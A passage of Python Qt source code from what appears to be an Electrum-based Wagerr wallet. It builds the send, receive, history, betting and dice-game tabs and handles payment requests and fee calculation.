    # Redraw the tabs once synced, or when offline/disconnected (short-circuit
    # order deliberately matches the connectivity checks).
    if self.wallet.up_to_date or not (self.network and self.network.is_connected()):
        self.update_tabs()
def update_tabs(self, wallet=None):
    """Refresh every tab's model and list for *wallet* (defaults to the current one)."""
    if wallet is None:
        wallet = self.wallet
    if wallet != self.wallet:
        # Stale callback for a different wallet window — ignore.
        return
    self.dice_history_model.refresh('update_tabs')
    self.betting_history_model.refresh('update_tabs') #put this to refresh first so it can fill bet label for history model
    self.history_model.refresh('update_tabs')
    self.request_list.update()
    self.address_list.update()
    self.utxo_list.update()
    self.contact_list.update()
    self.invoice_list.update()
    try:
        # Fetch the sports list synchronously (3 s timeout) from the network thread.
        self.sports_data = self.network.run_from_another_thread(self.network.get_sports_list(timeout=3)) #sport list
    except Exception as e:
        # Best-effort: keep the previously shown sports list on failure.
        self.logger.info(f'Error getting event list from network: {repr(e)}')
        return
    self.sports_list.build_sportlist(self.sports_data)
    self.sports_list.update()
    self.update_completions()
def create_history_tab(self):
    """Build the transaction-history tab: model, list view and toolbar."""
    self.history_model = HistoryModel(self)
    hist_list = HistoryList(self, self.history_model)
    self.history_list = hist_list
    self.history_model.set_view(self.history_list)
    hist_list.searchable_list = hist_list
    toolbar = hist_list.create_toolbar(self.config)
    hist_list.show_toolbar(self.config.get('show_toolbar_history', False))
    return self.create_list_tab(hist_list, toolbar)
def create_betting_history_tab(self):
    """Build the betting-history tab: model, styled list view and toolbar."""
    self.betting_history_model = BettingHistoryModel(self)
    bh_list = BettingHistoryList(self, self.betting_history_model)
    self.betting_history_list = bh_list
    self.betting_history_list.setStyleSheet(
        "QTreeView {"
        "show-decoration-selected: 1;"
        "}"
        "QTreeView::item {"
        "padding: 5px;"
        "}")
    self.betting_history_list.setAlternatingRowColors(True)
    self.betting_history_model.set_view(self.betting_history_list)
    bh_list.searchable_list = bh_list
    toolbar = bh_list.create_toolbar(self.config)
    bh_list.show_toolbar(self.config.get('show_toolbar_history', False))
    return self.create_list_tab(bh_list, toolbar)
def create_dice_history_grid(self):
    """Build the dice-game history view: model, styled list view and toolbar."""
    self.dice_history_model = DiceHistoryModel(self)
    dice_list = DiceHistoryList(self, self.dice_history_model)
    self.dice_history_list = dice_list
    self.dice_history_list.setStyleSheet(
        "QTreeView {"
        "show-decoration-selected: 1;"
        "}"
        "QTreeView::item {"
        "padding: 5px;"
        "}")
    self.dice_history_list.setAlternatingRowColors(True)
    self.dice_history_model.set_view(self.dice_history_list)
    dice_list.searchable_list = dice_list
    toolbar = dice_list.create_toolbar(self.config)
    dice_list.show_toolbar(self.config.get('show_toolbar_history', False))
    return self.create_list_tab(dice_list, toolbar)
def show_address(self, addr):
    """Open the modal address-details dialog for *addr*."""
    from . import address_dialog
    dlg = address_dialog.AddressDialog(self, addr)
    dlg.exec_()
def show_transaction(self, tx, tx_desc=None):
    """Open the transaction-details dialog for *tx*.

    tx_desc is set only for txs created in the Send tab.
    """
    # Delegates to the module-level show_transaction helper.
    show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
    """Build the Receive tab: address/description/amount fields, expiry
    selector, QR preview and the saved-requests list."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.receive_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    # Read-only receiving address with a copy button.
    self.receive_address_e = ButtonsLineEdit()
    self.receive_address_e.addCopyButton(self.app)
    self.receive_address_e.setReadOnly(True)
    msg = _('Wagerr address where the payment should be received. Note that each payment request uses a different Wagerr address.')
    self.receive_address_label = HelpLabel(_('Receiving address'), msg)
    self.receive_address_e.textChanged.connect(self.update_receive_qr)
    self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
    self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
    grid.addWidget(self.receive_address_label, 0, 0)
    grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
    self.receive_message_e = QLineEdit()
    grid.addWidget(QLabel(_('Description')), 1, 0)
    grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
    self.receive_message_e.textChanged.connect(self.update_receive_qr)
    self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
    self.receive_amount_e.setFixedWidth(18 * char_width_in_lineedit())
    grid.addWidget(QLabel(_('Requested amount')), 2, 0)
    grid.addWidget(self.receive_amount_e, 2, 1)
    self.receive_amount_e.textChanged.connect(self.update_receive_qr)
    # Optional fiat companion field, only visible when exchange rates are enabled.
    self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_receive_e.setVisible(False)
    grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
    self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
    # Expiry selector: combo while editing, read-only label for saved requests.
    self.expires_combo = QComboBox()
    self.expires_combo.addItems([i[0] for i in expiration_values])
    self.expires_combo.setCurrentIndex(3)
    self.expires_combo.setFixedWidth(self.receive_amount_e.width())
    msg = ' '.join([
        _('Expiration date of your request.'),
        _('This information is seen by the recipient if you send them a signed payment request.'),
        _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
        _('The bitcoin address never expires and will always be part of this electrum wallet.'),
    ])
    grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
    grid.addWidget(self.expires_combo, 3, 1)
    self.expires_label = QLineEdit('')
    self.expires_label.setReadOnly(1)
    self.expires_label.setFocusPolicy(Qt.NoFocus)
    self.expires_label.hide()
    grid.addWidget(self.expires_label, 3, 1)
    self.save_request_button = QPushButton(_('Save'))
    self.save_request_button.clicked.connect(self.save_payment_request)
    self.new_request_button = QPushButton(_('New'))
    self.new_request_button.clicked.connect(self.new_payment_request)
    # Clickable QR preview that toggles the separate QR window.
    self.receive_qr = QRCodeWidget(fixedSize=200)
    self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
    self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
    self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
    self.receive_buttons = buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.save_request_button)
    buttons.addWidget(self.new_request_button)
    grid.addLayout(buttons, 4, 1, 1, 2)
    self.receive_requests_label = QLabel(_('Requests'))
    from .request_list import RequestList
    self.request_list = RequestList(self)
    # layout: form + QR on top, saved requests list below
    vbox_g = QVBoxLayout()
    vbox_g.addLayout(grid)
    vbox_g.addStretch()
    hbox = QHBoxLayout()
    hbox.addLayout(vbox_g)
    hbox.addWidget(self.receive_qr)
    w = QWidget()
    w.searchable_list = self.request_list
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.receive_requests_label)
    vbox.addWidget(self.request_list)
    vbox.setStretchFactor(self.request_list, 1000)
    return w
def delete_payment_request(self, addr):
    """Remove the stored payment request for *addr* and reset the Receive tab."""
    self.wallet.remove_payment_request(addr, self.config)
    self.request_list.update()
    self.clear_receive_tab()
def get_request_URI(self, addr):
    """Build the BIP21 payment URI for the stored request at *addr*,
    including time/expiry and an optional base58 signature."""
    req = self.wallet.receive_requests[addr]
    message = self.wallet.labels.get(addr, '')
    amount = req['amount']
    extra = {}
    timestamp = req.get('time')
    if timestamp:
        extra['time'] = str(int(timestamp))
    expiry = req.get('exp')
    if expiry:
        extra['exp'] = str(int(expiry))
    if req.get('name') and req.get('sig'):
        raw_sig = bfh(req.get('sig'))
        extra['name'] = req['name']
        extra['sig'] = bitcoin.base_encode(raw_sig, base=58)
    uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra)
    return str(uri)
def sign_payment_request(self, addr):
    """Sign the payment request at *addr* with the configured alias key.

    Does nothing unless an alias is configured, its info has been resolved
    (self.alias_info), and the alias address belongs to this wallet.
    Prompts for the wallet password when the keystore is encrypted.
    """
    alias = self.config.get('alias')
    if alias and self.alias_info:
        alias_addr, alias_name, validated = self.alias_info
        if alias_addr:
            if self.wallet.is_mine(alias_addr):
                msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                self.password = None
                if self.wallet.has_keystore_encryption():
                    # Fixed: identity comparison with None ('is', not '==').
                    if self.password is None:
                        self.password = self.password_dialog(msg)
                    if not self.password:
                        # User cancelled the password dialog.
                        return
                try:
                    self.wallet.sign_payment_request(addr, alias, alias_addr, self.password)
                except Exception as e:
                    self.show_error(str(e))
                    return
            else:
                # Alias address is not ours: nothing to sign with.
                return
def save_payment_request(self):
    """Create and store a payment request from the Receive tab fields.

    Returns False (after showing an error) when neither a message nor an
    amount was entered; otherwise stores, signs and refreshes the lists.
    """
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    if not message and not amount:
        self.show_error(_('No message or amount'))
        return False
    i = self.expires_combo.currentIndex()
    # Map the selected combo row to its expiration value.
    expiration = list(map(lambda x: x[1], expiration_values))[i]
    req = self.wallet.make_payment_request(addr, amount, message, expiration)
    try:
        self.wallet.add_payment_request(req, self.config)
    except Exception as e:
        self.logger.exception('Error adding payment request')
        self.show_error(_('Error adding payment request') + ':\n' + str(e))
    else:
        self.sign_payment_request(addr)
        self.save_request_button.setEnabled(False)
    finally:
        # Refresh the lists whether or not the request was stored.
        self.request_list.update()
        self.address_list.update()
def view_and_paste(self, title, msg, data):
    """Show *data* in a modal dialog with a QR/text view and a copy button."""
    dlg = WindowModalDialog(self, title)
    layout = QVBoxLayout()
    description = QLabel(msg)
    description.setWordWrap(True)
    layout.addWidget(description)
    text_view = ShowQRTextEdit(text=data)
    layout.addWidget(text_view)
    layout.addLayout(Buttons(CopyCloseButton(text_view.text, self.app, dlg)))
    dlg.setLayout(layout)
    dlg.exec_()
def export_payment_request(self, addr):
    """Serialize the payment request for *addr* as BIP70 and save it to a
    user-chosen file."""
    req = self.wallet.receive_requests.get(addr)
    serialized = paymentrequest.serialize_request(req).SerializeToString()
    default_name = req['id'] + '.bip70'
    path = self.getSaveFileName(_("Select where to save your payment request"), default_name, "*.bip70")
    if not path:
        return
    with open(path, "wb+") as f:
        f.write(util.to_bytes(serialized))
    self.show_message(_("Request saved successfully"))
    self.saved = True
def new_payment_request(self):
    """Pick a fresh unused address (creating one if the user agrees) and
    prime the Receive tab with it."""
    addr = self.wallet.get_unused_address()
    if addr is None:
        if not self.wallet.is_deterministic():
            # Non-deterministic wallets cannot mint new addresses.
            msg = [
                _('No more addresses in your wallet.'),
                _('You are using a non-deterministic wallet, which cannot create new addresses.'),
                _('If you want to create new addresses, use a deterministic wallet instead.')
            ]
            self.show_message(' '.join(msg))
            return
        if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
            return
        addr = self.wallet.create_new_address(False)
    self.set_receive_address(addr)
    self.expires_label.hide()
    self.expires_combo.show()
    self.new_request_button.setEnabled(False)
    # NOTE(review): setFocus(1) passes 1 as the Qt focus reason; plain
    # setFocus() is the conventional call — confirm the argument is intended.
    self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
    """Point the Receive tab at *addr*, clearing the message and amount fields."""
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
    """Reset the Receive tab to a fresh receiving address and empty fields."""
    try:
        addr = self.wallet.get_receiving_address() or ''
    except InternalAddressCorruption as e:
        # Show the corruption error but still clear the tab.
        self.show_error(str(e))
        addr = ''
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
    self.expires_label.hide()
    self.expires_combo.show()
def toggle_qr_window(self):
    """Show or hide the detached QR-code window, restoring its last geometry."""
    from . import qrwindow
    if not self.qr_window:
        # First use: create the window and remember its initial geometry.
        self.qr_window = qrwindow.QR_Window(self)
        self.qr_window.setVisible(True)
        self.qr_window_geometry = self.qr_window.geometry()
    else:
        if not self.qr_window.isVisible():
            # Re-show at the position it last occupied.
            self.qr_window.setVisible(True)
            self.qr_window.setGeometry(self.qr_window_geometry)
        else:
            # Remember where it was before hiding it.
            self.qr_window_geometry = self.qr_window.geometry()
            self.qr_window.setVisible(False)
    self.update_receive_qr()
def show_send_tab(self):
    """Switch the main tab widget to the Send tab."""
    idx = self.tabs.indexOf(self.send_tab)
    self.tabs.setCurrentIndex(idx)
def show_receive_tab(self):
    """Switch the main tab widget to the Receive tab."""
    idx = self.tabs.indexOf(self.receive_tab)
    self.tabs.setCurrentIndex(idx)
def receive_at(self, addr):
    """Open the Receive tab showing *addr*; silently ignored when *addr*
    is not a valid address."""
    if not bitcoin.is_address(addr):
        return
    self.show_receive_tab()
    self.receive_address_e.setText(addr)
    self.new_request_button.setEnabled(True)
def update_receive_qr(self):
    """Regenerate the receive-tab QR code from the current address,
    amount and message, mirroring it to the detached QR window."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    # Saving only makes sense once something has been entered.
    self.save_request_button.setEnabled((amount is not None) or (message != ""))
    uri = util.create_bip21_uri(addr, amount, message)
    self.receive_qr.setData(uri)
    if self.qr_window and self.qr_window.isVisible():
        self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
    """Highlight the receive address in red when it has been used before."""
    addr = str(self.receive_address_e.text())
    if not self.wallet.is_used(addr):
        # Fresh address: clear any previous warning styling.
        self.receive_address_e.setStyleSheet("")
        self.receive_address_e.setToolTip("")
        return
    self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
    self.receive_address_e.setToolTip(_("This address has already been used. "
                                        "For better privacy, do not reuse it for new payments."))
def set_feerounding_text(self, num_satoshis_added):
    """Remember the tooltip text explaining the current fee-rounding amount."""
    template = _('Additional {} satoshis are going to be added.')
    self.feerounding_text = template.format(num_satoshis_added)
def create_send_tab(self):
    """Build the Send tab: pay-to/description/amount fields, fee controls
    (slider plus advanced fee/feerate edits) and the invoices list."""
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from .paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.amount_e.setFixedWidth(18 * char_width_in_lineedit())
    self.payto_e = PayToEdit(self)
    msg = _('Recipient of the funds.') + '\n\n'\
          + _('You may enter a Wagerr address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Wagerr address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    # Completion popup for contact labels/addresses.
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.set_completer(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
          + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = MyLineEdit()
    self.message_e.setMinimumWidth(700)
    grid.addWidget(self.message_e, 2, 1, 1, -1)
    # "From" list for coin control (spending from selected coins only).
    self.from_label = QLabel(_('From'))
    grid.addWidget(self.from_label, 3, 0)
    self.from_list = FromList(self, self.from_list_menu)
    grid.addWidget(self.from_list, 3, 1, 1, -1)
    self.set_pay_from([])
    msg = _('Amount to be sent.') + '\n\n' \
          + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
          + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
          + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 4, 0)
    grid.addWidget(self.amount_e, 4, 1)
    # Optional fiat companion field, only visible when exchange rates are enabled.
    self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_send_e.setVisible(False)
    grid.addWidget(self.fiat_send_e, 4, 2)
    self.amount_e.frozen.connect(
        lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
    self.max_button = EnterButton(_("Max"), self.spend_max)
    self.max_button.setFixedWidth(self.amount_e.width())
    self.max_button.setCheckable(True)
    grid.addWidget(self.max_button, 4, 3)
    hbox = QHBoxLayout()
    hbox.addStretch(1)
    grid.addLayout(hbox, 4, 4)
    msg = _('Wagerr transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
          + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
          + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
    self.fee_e_label = HelpLabel(_('Fee'), msg)

    def fee_cb(dyn, pos, fee_rate):
        # Slider callback: persist the chosen fee setting, then reflect
        # the new rate in the feerate edit and recompute the transaction.
        if dyn:
            if self.config.use_mempool_fees():
                self.config.set_key('depth_level', pos, False)
            else:
                self.config.set_key('fee_level', pos, False)
        else:
            self.config.set_key('fee_per_kb', fee_rate, False)
        if fee_rate:
            fee_rate = Decimal(fee_rate)
            self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
        else:
            self.feerate_e.setAmount(None)
        self.fee_e.setModified(False)
        self.fee_slider.activate()
        self.spend_max() if self.max_button.isChecked() else self.update_fee()
    self.fee_slider = FeeSlider(self, self.config, fee_cb)
    self.fee_slider.setFixedWidth(self.amount_e.width())

    def on_fee_or_feerate(edit_changed, editing_finished):
        # Keep the absolute-fee and feerate edits mutually exclusive:
        # only the most recently edited one is treated as user-fixed.
        edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
        if editing_finished:
            if edit_changed.get_amount() is None:
                # This is so that when the user blanks the fee and moves on,
                # we go back to auto-calculate mode and put a fee back.
                edit_changed.setModified(False)
        else:
            # edit_changed was edited just now, so make sure we will
            # freeze the correct fee setting (this)
            edit_other.setModified(False)
        self.fee_slider.deactivate()
        self.update_fee()

    class TxSizeLabel(QLabel):
        # Small label showing "x N bytes =" between feerate and fee.
        def setAmount(self, byte_size):
            self.setText(('x %s bytes =' % byte_size) if byte_size else '')
    self.size_e = TxSizeLabel()
    self.size_e.setAlignment(Qt.AlignCenter)
    self.size_e.setAmount(0)
    self.size_e.setFixedWidth(self.amount_e.width())
    self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
    self.feerate_e = FeerateEdit(lambda: 0)
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
    self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
    self.fee_e = BTCAmountEdit(self.get_decimal_point)
    self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
    self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))

    def feerounding_onclick():
        # Explain why the displayed fee may differ from feerate x size.
        text = (self.feerounding_text + '\n\n' +
                _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
                _('At most 100 satoshis might be lost due to this rounding.') + ' ' +
                _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
                _('Also, dust is not kept as change, but added to the fee.') + '\n' +
                _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
        self.show_message(title=_('Fee rounding'), msg=text)
    self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
    self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
    self.feerounding_icon.setFlat(True)
    self.feerounding_icon.clicked.connect(feerounding_onclick)
    self.feerounding_icon.setVisible(False)
    self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
    vbox_feelabel = QVBoxLayout()
    vbox_feelabel.addWidget(self.fee_e_label)
    vbox_feelabel.addStretch(1)
    grid.addLayout(vbox_feelabel, 5, 0)
    # Advanced fee controls (feerate / size / fee) are hidden unless enabled.
    self.fee_adv_controls = QWidget()
    hbox = QHBoxLayout(self.fee_adv_controls)
    hbox.setContentsMargins(0, 0, 0, 0)
    hbox.addWidget(self.feerate_e)
    hbox.addWidget(self.size_e)
    hbox.addWidget(self.fee_e)
    hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
    hbox.addStretch(1)
    vbox_feecontrol = QVBoxLayout()
    vbox_feecontrol.addWidget(self.fee_adv_controls)
    vbox_feecontrol.addWidget(self.fee_slider)
    grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
    if not self.config.get('show_fee', False):
        self.fee_adv_controls.setVisible(False)
    self.preview_button = EnterButton(_("Preview"), self.do_preview)
    self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
    self.send_button = EnterButton(_("Send"), self.do_send)
    self.clear_button = EnterButton(_("Clear"), self.do_clear)
    buttons = QHBoxLayout()
    buttons.addStretch(1)
    buttons.addWidget(self.clear_button)
    buttons.addWidget(self.preview_button)
    buttons.addWidget(self.send_button)
    grid.addLayout(buttons, 6, 1, 1, 3)
    self.amount_e.shortcut.connect(self.spend_max)
    self.payto_e.textChanged.connect(self.update_fee)
    self.amount_e.textEdited.connect(self.update_fee)

    def reset_max(text):
        # Any manual amount edit cancels "Max" mode.
        self.max_button.setChecked(False)
        enable = not bool(text) and not self.amount_e.isReadOnly()
        self.max_button.setEnabled(enable)
    self.amount_e.textEdited.connect(reset_max)
    self.fiat_send_e.textEdited.connect(reset_max)

    def entry_changed():
        # Recolor amount/fee/feerate fields: red for insufficient funds,
        # blue for auto-filled values, default for user-entered ones.
        text = ""
        amt_color = ColorScheme.DEFAULT
        fee_color = ColorScheme.DEFAULT
        feerate_color = ColorScheme.DEFAULT
        if self.not_enough_funds:
            amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
            feerate_color = ColorScheme.RED
            text = _("Not enough funds")
            c, u, x = self.wallet.get_frozen_balance()
            if c+u+x:
                text += " ({} {} {})".format(
                    self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
                )
        # blue color denotes auto-filled values
        elif self.fee_e.isModified():
            feerate_color = ColorScheme.BLUE
        elif self.feerate_e.isModified():
            fee_color = ColorScheme.BLUE
        elif self.amount_e.isModified():
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        else:
            amt_color = ColorScheme.BLUE
            fee_color = ColorScheme.BLUE
            feerate_color = ColorScheme.BLUE
        self.statusBar().showMessage(text)
        self.amount_e.setStyleSheet(amt_color.as_stylesheet())
        self.fee_e.setStyleSheet(fee_color.as_stylesheet())
        self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
    self.amount_e.textChanged.connect(entry_changed)
    self.fee_e.textChanged.connect(entry_changed)
    self.feerate_e.textChanged.connect(entry_changed)
    self.invoices_label = QLabel(_('Invoices'))
    from .invoice_list import InvoiceList
    self.invoice_list = InvoiceList(self)
    # layout: send form on top, invoices list below
    vbox0 = QVBoxLayout()
    vbox0.addLayout(grid)
    hbox = QHBoxLayout()
    hbox.addLayout(vbox0)
    w = QWidget()
    vbox = QVBoxLayout(w)
    vbox.addLayout(hbox)
    vbox.addStretch(1)
    vbox.addWidget(self.invoices_label)
    vbox.addWidget(self.invoice_list)
    vbox.setStretchFactor(self.invoice_list, 1000)
    w.searchable_list = self.invoice_list
    run_hook('create_send_tab', grid)
    return w
def create_chaingames_tab(self):
    """Build and return the chain-games tab (quick-game list + Dice widget)."""
    self.grid_chaingames = grid = QGridLayout()
    # NOTE(review): setColumnStretch expects an int stretch factor; the float
    # arguments below (1.3 / 8.7) may be rejected or truncated by PyQt — confirm.
    self.grid_chaingames.setColumnStretch(0,1.3)
    self.grid_chaingames.setColumnMinimumWidth(0,100)
    self.grid_chaingames.setColumnStretch(1,8.7)
    self.quickgame_list = QuickGameListView(self)
    self.quickgame_list.selectionModel().selectionChanged.connect(self.chaingame_changed)
    # Maps game name -> widget displayed in the right-hand pane.
    self.chaingame_widgets = {
        "Dice": DiceGameWidget(self),
    }
    self.grid_chaingames.addWidget(self.quickgame_list, 0,0)
    self.grid_chaingames.addWidget(self.chaingame_widgets["Dice"], 0,1)
    self.w = QWidget()
    self.w.setLayout(self.grid_chaingames)
    run_hook('create_chaingames_tab',grid)
    return self.w
# For upcoming games.
def chaingame_changed(self,newIdx,oldIdx = None):
    """React to a new quick-game selection: remember the chosen game name."""
    selected_index = newIdx.indexes()[0]
    game_item = self.quickgame_list.model().itemFromIndex(selected_index)
    # Drop any parenthesised suffix, e.g. "Dice (beta)" -> "Dice".
    self.selectedGame = re.sub(r'\([^)]*\)', '', game_item.text()).strip()
    print("Selected Game : ", self.selectedGame)
    self.quickgame_list.selectionModel().setCurrentIndex(selected_index, QItemSelectionModel.SelectCurrent)
@pyqtSlot()
def search_team(self):
    """Apply the text in the team search box as the event-list filter.

    Triggered by the debounce QTimer once the user stops typing.
    Fix: the original code had a bare ``pyqtSlot(str)`` expression above the
    def, which built a decorator and discarded it; it is now applied properly
    (with no arguments, since this slot takes none).
    """
    self.search_filter = self.team_search_box.text()
    self.sports_list.update()
def create_betting_tab(self):
    """Build and return the betting tab: sport list, event list and bet slip."""
    self.grid_betting = grid =QGridLayout()
    # NOTE(review): setColumnStretch expects int stretch factors; the float
    # values (1.3 / 6.7) may be rejected or truncated by PyQt — confirm.
    self.grid_betting.setColumnStretch(0,1.3)
    self.grid_betting.setColumnStretch(1,6.7)
    self.grid_betting.setColumnStretch(2,2)
    self.grid_betting.setColumnMinimumWidth(0,100)
    # Central list of betting events.
    self.eventQListWidget = QListWidget()
    self.eventQListWidget.setMinimumWidth(800)
    self.eventQListWidget.setStyleSheet("QListWidget { border:0px; background-color:#DEE2E6; } QListWidget::item { background-color:#fff}")
    self.eventQListWidget.setSpacing(10)
    self.eventQListWidget.verticalScrollBar().setSingleStep(20)
    self.sports_list = SportListView(self)
    self.vbox_grid = QVBoxLayout()
    self.list_header_backg = QWidget()
    self.list_header_backg.setContentsMargins(0,0,0,0)
    self.list_header_backg.setStyleSheet(
        "QWidget{"
        "background-color:#BD0000;"
        "margin:0 5px;"
        "}"
    )
    self.hbox_list_header = QHBoxLayout(self.list_header_backg)
    self.hbox_list_header.addStretch(0)
    # Debounce: the search runs 500 ms after the user stops typing.
    self.typing_timer = QTimer()
    self.typing_timer.setSingleShot(True)
    self.typing_timer.timeout.connect(self.search_team)
    self.team_search_box = ButtonsLineEdit()
    self.search_filter = '' #global variable for event list search filter
    self.team_search_box.setStyleSheet("background-color:white;")
    self.team_search_box.addButton("clear.png", self.team_search_box.clear, _("Clear Search"))
    self.team_search_box.setMinimumSize(350,35)
    self.team_search_box.setPlaceholderText("Search by team, sport or event id.")
    self.team_search_box.textChanged.connect(lambda: self.typing_timer.start(500))
    self.hbox_list_header.insertWidget(0,self.team_search_box)
    # Shows whether effective or on-chain odds are displayed (config-driven).
    self.odds_type_label = QLabel("Current Odds Type: " + (str("Effective") if self.config.get('iseffectiveodds',True) else str("Onchain")))
    self.odds_type_label.setStyleSheet("font-weight:bold;color:white")
    self.hbox_list_header.insertWidget(2,self.odds_type_label)
    self.vbox_grid.addWidget(self.list_header_backg)
    self.vbox_grid.addWidget(self.eventQListWidget)
    self.betting_main_widget = BettingMainWidget(self)
    self.w = QWidget()
    self.grid_betting.addWidget(self.sports_list,0,0)
    self.grid_betting.addLayout(self.vbox_grid,0,1)
    self.grid_betting.addWidget(self.betting_main_widget,0,2)
    #self.grid_betting.setColumnMinimumWidth(1,1120)
    self.w.setLayout(self.grid_betting)
    #self.w.setMinimumSize(800, 800)
    run_hook('create_betting_tab', grid)
    return self.w
def spend_max(self):
    """Select the maximum spendable amount, unless a plugin vetoes sending."""
    aborted = run_hook('abort_send', self)
    if aborted:
        return
    self.max_button.setChecked(True)
    self.do_update_fee()
def update_fee(self):
    """Mark the displayed fee as stale; a timer-driven refresh recomputes it."""
    self.require_fee_update = True
def get_payto_or_dummy(self):
    """Return the payto field's recipient, or a dummy wallet address for sizing."""
    recipient = self.payto_e.get_recipient()
    return recipient or (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
    '''Recalculate the fee. If the fee was manually input, retain it, but
    still build the TX to see if there are enough funds.

    Builds a draft transaction from the send tab's current state and updates
    the fee, feerate, size and rounding-icon widgets accordingly.
    '''
    freeze_fee = self.is_send_fee_frozen()
    freeze_feerate = self.is_send_feerate_frozen()
    amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
    if amount is None:
        # No amount entered yet: clear the fee display (unless frozen) and bail.
        if not freeze_fee:
            self.fee_e.setAmount(None)
        self.not_enough_funds = False
        self.statusBar().showMessage('')
        return
    outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
    if not outputs:
        # No parsed outputs yet; use a dummy address so the draft tx can be sized.
        _type, addr = self.get_payto_or_dummy()
        outputs = [TxOutput(_type, addr, amount)]
    is_sweep = bool(self.tx_external_keypairs)
    make_tx = lambda fee_est: \
        self.wallet.make_unsigned_transaction(
            coins, outputs, self.config,
            fixed_fee=fee_est, is_sweep=is_sweep)
    try:
        tx = make_tx(fee_estimator)
        self.not_enough_funds = False
    except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
        if not freeze_fee:
            self.fee_e.setAmount(None)
        if not freeze_feerate:
            self.feerate_e.setAmount(None)
        self.feerounding_icon.setVisible(False)
        if isinstance(e, NotEnoughFunds):
            self.not_enough_funds = True
        elif isinstance(e, NoDynamicFeeEstimates):
            # No fee estimates available: build a zero-fee tx just to get its size.
            try:
